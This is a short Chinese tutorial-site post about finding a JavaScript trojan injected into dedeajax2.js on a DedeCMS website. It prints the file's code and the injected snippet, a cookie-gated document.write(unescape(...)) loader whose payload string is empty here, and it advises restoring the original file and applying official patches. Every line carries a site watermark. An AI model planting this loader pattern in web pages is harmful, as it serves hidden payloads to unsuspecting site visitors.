dedecms:dedeajax2.js被植入js木马_dedecms_CMS教程_迪尔课堂

这阵子我的一个网站被植入了木马,程序dede。于是我升级到了IE7+全补丁,为了查木马做准备工作,呵呵。结果发现,dedeajax2.js被植入了木马。源码如下:OEX迪尔课堂自学网-|第二课堂|--(官网)
OEX迪尔课堂自学网-|第二课堂|--(官网)
//初始化xmldomOEX迪尔课堂自学网-|第二课堂|--(官网)
function InitXDom(){OEX迪尔课堂自学网-|第二课堂|--(官网)
if(DedeXDOM!=null) return;OEX迪尔课堂自学网-|第二课堂|--(官网)
var obj = null;OEX迪尔课堂自学网-|第二课堂|--(官网)
if (typeof(DOMParser) != "undefined") { // Gecko、Mozilla、FirefoxOEX迪尔课堂自学网-|第二课堂|--(官网)
var parser = new DOMParser();OEX迪尔课堂自学网-|第二课堂|--(官网)
obj = parser.parseFromString(xmlText, "text/xml");OEX迪尔课堂自学网-|第二课堂|--(官网)
} else { // IEOEX迪尔课堂自学网-|第二课堂|--(官网)
try { obj = new ActiveXObject("MSXML2.DOMDocument");} catch (e) { }OEX迪尔课堂自学网-|第二课堂|--(官网)
if (obj == null) try { obj = new ActiveXObject("Microsoft.XMLDOM"); } catch (e) { }OEX迪尔课堂自学网-|第二课堂|--(官网)
}OEX迪尔课堂自学网-|第二课堂|--(官网)
DedeXDOM = obj;OEX迪尔课堂自学网-|第二课堂|--(官网)
};OEX迪尔课堂自学网-|第二课堂|--(官网)
//以下是被植入木马的部分,乱码都是经由unicode码处理。现在的马夫越来越狡猾了OEX迪尔课堂自学网-|第二课堂|--(官网)
if(document.cookie.indexOf('hello')==-1){var expires=new Date();expires.setTime(expires.getTime() 24*60*60*1000);document.cookie='hello=Yes;path=/;expires=' expires.toGMTString();document.write(unescape(""));}OEX迪尔课堂自学网-|第二课堂|--(官网)
OEX迪尔课堂自学网-|第二课堂|--(官网)
用原版本的dedeajax2覆盖,即可。这个文件,dede的模板都要用到,搜索了,没有发现说明用处。OEX迪尔课堂自学网-|第二课堂|--(官网)
OEX迪尔课堂自学网-|第二课堂|--(官网)
不过建议大家,多注意dedecms的官方补丁,unix服务器的站长,千万别所有文件都是设置,虽然dede在unix的服务器上,设置太过繁琐。OEX迪尔课堂自学网-|第二课堂|--(官网)
OEX迪尔课堂自学网-|第二课堂|--(官网)
关键字描述:木马 obj " if new // null var dede 植入

扫一扫手机访问